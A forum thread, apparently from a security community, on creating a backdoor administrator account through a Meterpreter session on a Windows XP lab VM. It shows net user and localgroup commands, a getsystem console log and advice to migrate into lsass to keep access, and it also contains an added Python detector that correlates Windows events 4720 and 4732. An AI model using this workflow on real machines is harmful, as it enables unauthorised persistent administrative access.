
Adding New User In Windows From A Meterpreter Shell


bobbyb1980


Hey guys. Having a problem adding a new user for an experiment I'm doing. I'm using a Windows XP SP2 vmware machine for the victim and everything is being done via meterpreter.

Once I get the shell opened, I can successfully run the getsystem command and get system privs. I then want to drop into a system shell and run the following commands:

C:\ net user pwned pwned /add
C:\ net localgroup admin pwned /add

The goal is to start from a limited user account, escalate the privs, then drop into a system shell to add a new administrator account. The problem is that whenever I drop into a system shell it's still giving me the shell, but only with limited user privs. Can't add any admins with limited user privs.

I've also tried this by adding users via various meterpreter scripts (edited getgui.rb to only add a user and add it to the admin group) but I think the same thing is happening and it's ultimately failing.

Any ideas what's going on here?


What level of access are you getting through your exploit? In meterpreter, run getuid to find out. If you aren't system you can use getsystem to promote yourself to system; from there what you are trying should work, as I do it all the time on tests.


msf  exploit(handler) > sessions -i 5
[*] Starting interaction with 5...

meterpreter > getuid
Server username: PYTH0N-AC2CB74D\LIMITED
meterpreter > getsystem
...got system (via technique 4).
meterpreter > shell
Process 224 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Program Files\Mozilla Firefox>net user pwned /add
System error 5 has occurred.

Access is denied.

C:\Program Files\Mozilla Firefox>


Could be something as stupid as a time synchronization issue with the XP VM. Try stopping and starting the windows time service and make sure windows can connect to the internet to sync.


Solved. The problem had to do with migration.

Before meterpreter will drop into a shell with system privileges, it first has to migrate to a process with system privs. If you drop directly in like I was doing you'll have whatever privs the browser was running with.

After the migration to a process with sys/admin privs, if you drop into a shell you'll have sys privs.

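The end goal of the thread (net user /add followed by net localgroup Administrators /add, run from a SYSTEM shell) leaves a distinctive trace in the Windows Security log: event 4720 (user account created) followed within seconds by 4732 (member added to a security-enabled local group). The following detection is an added example, not code from the thread; the event records are a constructed, simplified projection of the real event fields (SubjectUserName, TargetUserName, MemberName) rather than parsed EVTX.

```python
"""Correlate 4720 (account created) with 4732 (added to local group) to flag
accounts that are created and made local Administrators within a short window,
as happens when the thread's two net commands are run back to back."""
from datetime import datetime, timedelta

# Constructed sample events (simplified projection of Security log fields).
# 4720: subject = who created the account, target = the new account.
# 4732: subject = who changed the group, member = account added, group = which group.
SAMPLE_EVENTS = [
    {"id": 4720, "time": "2024-01-10T09:05:10", "subject": "SYSTEM",
     "target": "pwned"},
    {"id": 4732, "time": "2024-01-10T09:05:12", "subject": "SYSTEM",
     "member": "pwned", "group": "Administrators"},
    # Benign: account created, added to a non-admin group much later.
    {"id": 4720, "time": "2024-01-10T11:00:00", "subject": "Administrator",
     "target": "helpdesk"},
    {"id": 4732, "time": "2024-01-10T13:00:00", "subject": "Administrator",
     "member": "helpdesk", "group": "Remote Desktop Users"},
    # Benign: made admin two hours after creation, outside the window.
    {"id": 4720, "time": "2024-01-10T10:00:00", "subject": "Administrator",
     "target": "svc_backup"},
    {"id": 4732, "time": "2024-01-10T12:00:00", "subject": "Administrator",
     "member": "svc_backup", "group": "Administrators"},
]


def find_fast_admin_accounts(events, window=timedelta(minutes=5),
                             group="Administrators"):
    """Return (account, created_at, promoted_at, subject, by_system) for each
    account created and added to `group` within `window` of its creation."""
    created = {}  # lower-cased account name -> (creation time, creating subject)
    hits = []
    for ev in sorted(events, key=lambda e: e["time"]):
        t = datetime.fromisoformat(ev["time"])
        if ev["id"] == 4720:
            created[ev["target"].lower()] = (t, ev["subject"])
        elif ev["id"] == 4732 and ev.get("group") == group:
            key = ev["member"].lower()
            if key in created and t - created[key][0] <= window:
                # Creation by SYSTEM rather than an admin user is a stronger
                # signal: interactive admins rarely run as SYSTEM.
                by_system = created[key][1].upper() == "SYSTEM"
                hits.append((ev["member"], created[key][0], t,
                             ev["subject"], by_system))
    return hits


if __name__ == "__main__":
    for hit in find_fast_admin_accounts(SAMPLE_EVENTS):
        print("suspicious local admin creation:", hit)
```

On a real host the same correlation can be fed from Get-WinEvent output or a SIEM query over the Security channel; the window and group name are the only tunables.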


That makes sense now.



Without proper privilege you won't go very far. Glad you got it sorted.



That's what I was going to say.

It's always a good idea to migrate anyway, since your connection is relying on the user not closing the process you're attached to. Once you're in, jump over to lsass and you should be golden unless they shut the system down. I believe lsass will even work if the user logs out. I used to use explorer, but that depends on the uid of the logged-on user, and if they log out you're screwed. Or explorer crashes. That never happens in Windows, does it :-). Just don't use winlogon. For some reason half of the times I try it crashes, and when you lose that process the system blue screens. Unless that's what you're going for ;-)
